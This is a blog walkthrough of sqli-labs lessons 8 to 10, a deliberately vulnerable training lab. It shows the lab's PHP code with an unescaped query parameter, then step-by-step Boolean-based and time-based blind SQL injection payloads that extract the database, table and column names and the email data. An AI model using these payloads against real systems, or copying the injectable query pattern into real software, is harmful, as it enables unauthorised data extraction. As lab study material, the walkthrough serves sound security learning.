sqli-labs (Less-8 to Less-10) walkthrough notes

Less-8 (GET - Blind - Boolean Based - Single Quotes): GET type, Boolean-based blind injection, parameter wrapped in single quotes

php key code is as follows

<?php
// Less-8 index.php. $id is taken straight from the GET parameter and placed
// inside single quotes with no escaping: that is the injection point.
// The outer isset() check is the one sqli-labs uses; without it the final
// closing brace and else-branch below have nothing to match.
if(isset($_GET['id']))
{
$id=$_GET['id'];
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
	if($row)
	{
  	echo '<font size="5" color="#FFFF00">';	
  	echo 'You are in...........';
  	echo "<br>";
    	echo "</font>";
  	}
	else 
	{
	echo '<font size="5" color="#FFFF00">';
	//echo 'You are in...........';
	//print_r(mysql_error());                       // error output disabled
	//echo "You have an error in your SQL syntax";
	echo "</br></font>";	
	echo '<font color= "#0000ff" font size= 3>';	
	}
}
	else { echo "Please input the ID as parameter with numeric value";}
?>

Analysis of the code shows that the page can only show two results: either "You are in..........." or an empty page.

Errors are never displayed: both mysql_error() and the "You have an error in your SQL syntax" line are commented out, so error-based injection is ruled out.

In this case we can use Boolean-based blind injection or DNSlog injection. Here we use Boolean-based blind injection first (because I haven't understood the principle of the second one yet).

Introduction to Boolean-based blind injection

Blind injection means that, during SQL injection, the data selected by the injected statement is never echoed to the page. We therefore need some way to judge whether our query succeeded; this process is called blind injection.

Utilization scenarios

The page has no display position for query results and outputs no SQL error messages. All you can observe is whether the page renders normally or abnormally (here: whether "You are in..........." appears), which gives one bit of information per request.

Injection process

Judge whether there is injection: the first payload should render normally and the second should give an empty page

?id=1' and 1=1 --+
?id=1' and 1=2 --+

or compare a bare ?id=1' (the unbalanced quote breaks the query, empty page) with ?id=1'%23 (the # comments out the trailing quote, normal page)

?id=1'%23


The length of the database name can be determined with Burp's Intruder module: mark the 8 in the payload below as the payload position and set a number range of 1-128. The value that yields the normal page is the length.

?id=1' and length(database())=8 --+  

 
Brute-force the database name by ASCII code: iterate over both the start position and the ASCII value (the =1 below is just the starting value). mid(string, start, length) returns `length` characters from position `start`, counting from 1.

?id=1' and ascii(mid(database(),1,1))=1 --+     


Use substr to brute-force the table name in the same way; the result is emails. substr(string, start, length) works like mid().

?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=101 --+


Brute-force the column names; the result is id,email_id

?id=1' and ascii(substr((select column_name from information_schema.columns where table_name='emails' limit 0,1),1,1))=101 --+


Get data

?id=1' and ascii(substr((select email_id from security.emails limit 0,1),1,1))=101 --+

Less-9 (GET - Blind - Time based - Single Quotes): GET type, time-based blind injection, parameter wrapped in single quotes

php key code is as follows

<?php
// Less-9 index.php. The query is built exactly as in Less-8; the difference
// is that both branches print the same banner, so the page looks identical
// whether the injected condition is true or false.
if(isset($_GET['id']))
{
$id=$_GET['id'];
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row)
{
  	echo '<font size="5" color="#FFFF00">';	
  	echo 'You are in...........';
  	echo "<br>";
    echo "</font>";
  	}
else 
	{
	echo '<font size="5" color="#FFFF00">';
	echo 'You are in...........';                   // same banner on failure
	//print_r(mysql_error());
	//echo "You have an error in your SQL syntax";
	echo "</br></font>";	
	echo '<font color= "#0000ff" font size= 3>';		
	}
}
	else { echo "Please input the ID as parameter with numeric value";}
?>

Analysis of the code shows that whether the query succeeds or fails, the page returns the same single result, "You are in...........".

Boolean-based blind injection therefore does not work, so we turn to time-based blind injection.

Utilization scenarios

There is no display position on the page and no error output, and the page for a correct SQL statement is identical to the page for an incorrect one. The only observable signal left is the response time.

Related functions

if(condition, value_if_true, value_if_false)

The first argument is an expression that yields a Boolean. When it is true, the second argument is evaluated and returned; otherwise the third is.

ascii(str)

Returns the ASCII code of the first character of str (the code of that character if a single character is passed; 0 for an empty string).

substr(str, start, length)

Cuts a piece out of a string: str is the string to cut, start is the starting position (1 is the first character), and length is the number of characters to take.

benchmark(count, expr)

count is the number of repetitions and expr is an expression. BENCHMARK() evaluates expr count times; it is intended for measuring how fast MySQL processes an expression, and its return value is always 0. Because the repeated evaluation takes measurable time, it serves as a delay primitive when sleep() is unavailable.

Example: if(condition,benchmark(50000000,md5(123456)),1). If the condition is true the response pauses for several seconds; the exact delay depends heavily on the server's CPU, which makes it less predictable than sleep().

mysql> select if(2>1,benchmark(50000000,md5(123456)),1);
+-------------------------------------------+
| if(2>1,benchmark(50000000,md5(123456)),1) |
+-------------------------------------------+
|                                         0 |
+-------------------------------------------+
1 row in set (9.91 sec)

Injection process

Judge whether there is injection: the response should take about 10 seconds

?id=1' and sleep(10) --+

Judge the length of the database name

?id=1' and if(length(database())=8,sleep(5),1) --+

Extract the database name one character at a time, either by comparing the character directly or by its ASCII code; the result is security

?id=1' and if(substr(database(),1,1)='s',sleep(5),1) --+
?id=1' and if(ascii(substr(database(),1,1))=115,sleep(10),1) --+

Brute-force the table name; the result is emails

?id=1' and if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=101,sleep(10),1) --+

Brute-force the column names; the result is id,email_id

?id=1' and if(ascii(substr((select column_name from information_schema.columns where table_name='emails' limit 0,1),1,1))=105,sleep(10),1) --+

Get the data

?id=1' and if(ascii(substr((select email_id from security.emails limit 0,1),1,1))=68,sleep(10),1) --+

Hmm, this kind of time-based blind injection with Burp brute-forcing is also troublesome. After learning Python, you can write an exploit script to do the brute-forcing. The main point here is to understand the principle and how the functions are used.

Less-10 (GET - Blind - Time based - Double Quotes): GET type, time-based blind injection, parameter wrapped in double quotes

$id = '"'.$id.'"';   // the double quotes are added in PHP before the query is built
$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";

The only difference from Less-9 is that the parameter is wrapped in double quotation marks, so every Less-9 payload works here once the leading single quote that closes the string is replaced with a double quote.

Tags: MySQL PHP programming language sqli-labs

Posted by siko on Mon, 30 May 2022 02:45:49 +0530